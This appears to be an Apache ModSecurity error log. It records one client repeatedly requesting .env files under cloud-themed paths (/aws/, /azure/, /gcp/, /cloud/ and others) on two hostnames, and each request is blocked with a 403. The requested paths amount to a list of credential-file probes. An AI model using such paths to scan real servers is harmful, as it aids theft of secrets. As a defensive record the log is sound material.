[Mon May 11 16:27:04.297488 2026] [security2:error] [pid 1411055:tid 1411079] [client 18.180.54.2:54186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/bulk/.env"] [unique_id "agHnOEWKUxpmnkK7zHx8XwAAARY"]
[Mon May 11 16:27:04.297973 2026] [core:error] [pid 1411055:tid 1411079] [client 18.180.54.2:54186] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:04.298130 2026] [security2:error] [pid 1411055:tid 1411079] [client 18.180.54.2:54186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/bulk/.env"] [unique_id "agHnOEWKUxpmnkK7zHx8XwAAARY"]
[Mon May 11 16:27:04.712265 2026] [security2:error] [pid 1411201:tid 1411262] [client 18.180.54.2:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /transactional/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/transactional/.env"] [unique_id "agHnOPy_GXSWIKeli0vyqgAAAJA"]
[Mon May 11 16:27:04.712499 2026] [security2:error] [pid 1411201:tid 1411262] [client 18.180.54.2:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/transactional/.env"] [unique_id "agHnOPy_GXSWIKeli0vyqgAAAJA"]
[Mon May 11 16:27:04.713000 2026] [core:error] [pid 1411201:tid 1411262] [client 18.180.54.2:54200] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:04.713169 2026] [security2:error] [pid 1411201:tid 1411262] [client 18.180.54.2:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/transactional/.env"] [unique_id "agHnOPy_GXSWIKeli0vyqgAAAJA"]
[Mon May 11 16:27:05.024092 2026] [security2:error] [pid 1412074:tid 1412092] [client 18.180.54.2:54204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /aws/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/aws/.env"] [unique_id "agHnOTJnyuKVXoStDha1VgAAAFA"]
[Mon May 11 16:27:05.024361 2026] [security2:error] [pid 1412074:tid 1412092] [client 18.180.54.2:54204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/aws/.env"] [unique_id "agHnOTJnyuKVXoStDha1VgAAAFA"]
[Mon May 11 16:27:05.024871 2026] [core:error] [pid 1412074:tid 1412092] [client 18.180.54.2:54204] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:05.025026 2026] [security2:error] [pid 1412074:tid 1412092] [client 18.180.54.2:54204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/aws/.env"] [unique_id "agHnOTJnyuKVXoStDha1VgAAAFA"]
[Mon May 11 16:27:05.436591 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:54206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bulk/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/bulk/.env"] [unique_id "agHnOfy_GXSWIKeli0vyqwAAAJM"]
[Mon May 11 16:27:05.436819 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:54206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/bulk/.env"] [unique_id "agHnOfy_GXSWIKeli0vyqwAAAJM"]
[Mon May 11 16:27:05.437332 2026] [core:error] [pid 1411201:tid 1411424] [client 18.180.54.2:54206] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:05.437503 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:54206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/bulk/.env"] [unique_id "agHnOfy_GXSWIKeli0vyqwAAAJM"]
[Mon May 11 16:27:05.771780 2026] [security2:error] [pid 1412074:tid 1412089] [client 18.180.54.2:54220] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/azure/.env"] [unique_id "agHnOTJnyuKVXoStDha1VwAAAE0"]
[Mon May 11 16:27:05.772000 2026] [security2:error] [pid 1412074:tid 1412089] [client 18.180.54.2:54220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/azure/.env"] [unique_id "agHnOTJnyuKVXoStDha1VwAAAE0"]
[Mon May 11 16:27:05.772496 2026] [core:error] [pid 1412074:tid 1412089] [client 18.180.54.2:54220] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:05.772646 2026] [security2:error] [pid 1412074:tid 1412089] [client 18.180.54.2:54220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/azure/.env"] [unique_id "agHnOTJnyuKVXoStDha1VwAAAE0"]
[Mon May 11 16:27:06.139647 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:54234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /aws/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/aws/.env"] [unique_id "agHnOkWKUxpmnkK7zHx8YQAAARg"]
[Mon May 11 16:27:06.139913 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:54234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/aws/.env"] [unique_id "agHnOkWKUxpmnkK7zHx8YQAAARg"]
[Mon May 11 16:27:06.140460 2026] [core:error] [pid 1411055:tid 1411081] [client 18.180.54.2:54234] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:06.140625 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:54234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/aws/.env"] [unique_id "agHnOkWKUxpmnkK7zHx8YQAAARg"]
[Mon May 11 16:27:06.466446 2026] [security2:error] [pid 1411099:tid 1411116] [client 18.180.54.2:54238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/gcp/.env"] [unique_id "agHnOg-Qm4vhlWBPlMi6cAAAABA"]
[Mon May 11 16:27:06.466676 2026] [security2:error] [pid 1411099:tid 1411116] [client 18.180.54.2:54238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/gcp/.env"] [unique_id "agHnOg-Qm4vhlWBPlMi6cAAAABA"]
[Mon May 11 16:27:06.468057 2026] [core:error] [pid 1411099:tid 1411116] [client 18.180.54.2:54238] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:06.468429 2026] [security2:error] [pid 1411099:tid 1411116] [client 18.180.54.2:54238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/gcp/.env"] [unique_id "agHnOg-Qm4vhlWBPlMi6cAAAABA"]
[Mon May 11 16:27:06.828386 2026] [security2:error] [pid 1411099:tid 1411114] [client 18.180.54.2:54246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/azure/.env"] [unique_id "agHnOg-Qm4vhlWBPlMi6cQAAAA4"]
[Mon May 11 16:27:06.828635 2026] [security2:error] [pid 1411099:tid 1411114] [client 18.180.54.2:54246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/azure/.env"] [unique_id "agHnOg-Qm4vhlWBPlMi6cQAAAA4"]
[Mon May 11 16:27:06.829215 2026] [core:error] [pid 1411099:tid 1411114] [client 18.180.54.2:54246] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:06.829386 2026] [security2:error] [pid 1411099:tid 1411114] [client 18.180.54.2:54246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/azure/.env"] [unique_id "agHnOg-Qm4vhlWBPlMi6cQAAAA4"]
[Mon May 11 16:27:07.195841 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.180.54.2:54262] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/cloud/.env"] [unique_id "agHnO_y_GXSWIKeli0vyrgAAAJQ"]
[Mon May 11 16:27:07.196079 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.180.54.2:54262] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/cloud/.env"] [unique_id "agHnO_y_GXSWIKeli0vyrgAAAJQ"]
[Mon May 11 16:27:07.196566 2026] [core:error] [pid 1411201:tid 1411265] [client 18.180.54.2:54262] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:07.196730 2026] [security2:error] [pid 1411201:tid 1411265] [client 18.180.54.2:54262] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/cloud/.env"] [unique_id "agHnO_y_GXSWIKeli0vyrgAAAJQ"]
[Mon May 11 16:27:07.515895 2026] [security2:error] [pid 1412074:tid 1412091] [client 18.180.54.2:54270] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/gcp/.env"] [unique_id "agHnOzJnyuKVXoStDha1WQAAAE8"]
[Mon May 11 16:27:07.516666 2026] [security2:error] [pid 1412074:tid 1412091] [client 18.180.54.2:54270] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/gcp/.env"] [unique_id "agHnOzJnyuKVXoStDha1WQAAAE8"]
[Mon May 11 16:27:07.517209 2026] [core:error] [pid 1412074:tid 1412091] [client 18.180.54.2:54270] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:07.517742 2026] [security2:error] [pid 1412074:tid 1412091] [client 18.180.54.2:54270] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/gcp/.env"] [unique_id "agHnOzJnyuKVXoStDha1WQAAAE8"]
[Mon May 11 16:27:07.904388 2026] [security2:error] [pid 1412074:tid 1412077] [client 18.180.54.2:54272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /infrastructure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/infrastructure/.env"] [unique_id "agHnOzJnyuKVXoStDha1WgAAAEE"]
[Mon May 11 16:27:07.904614 2026] [security2:error] [pid 1412074:tid 1412077] [client 18.180.54.2:54272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/infrastructure/.env"] [unique_id "agHnOzJnyuKVXoStDha1WgAAAEE"]
[Mon May 11 16:27:07.905143 2026] [core:error] [pid 1412074:tid 1412077] [client 18.180.54.2:54272] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:07.905326 2026] [security2:error] [pid 1412074:tid 1412077] [client 18.180.54.2:54272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/infrastructure/.env"] [unique_id "agHnOzJnyuKVXoStDha1WgAAAEE"]
[Mon May 11 16:27:08.245465 2026] [security2:error] [pid 1411099:tid 1411104] [client 18.180.54.2:54278] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cloud/.env"] [unique_id "agHnPA-Qm4vhlWBPlMi6cgAAAAM"]
[Mon May 11 16:27:08.245689 2026] [security2:error] [pid 1411099:tid 1411104] [client 18.180.54.2:54278] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cloud/.env"] [unique_id "agHnPA-Qm4vhlWBPlMi6cgAAAAM"]
[Mon May 11 16:27:08.246185 2026] [core:error] [pid 1411099:tid 1411104] [client 18.180.54.2:54278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:08.249365 2026] [security2:error] [pid 1411099:tid 1411104] [client 18.180.54.2:54278] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cloud/.env"] [unique_id "agHnPA-Qm4vhlWBPlMi6cgAAAAM"]
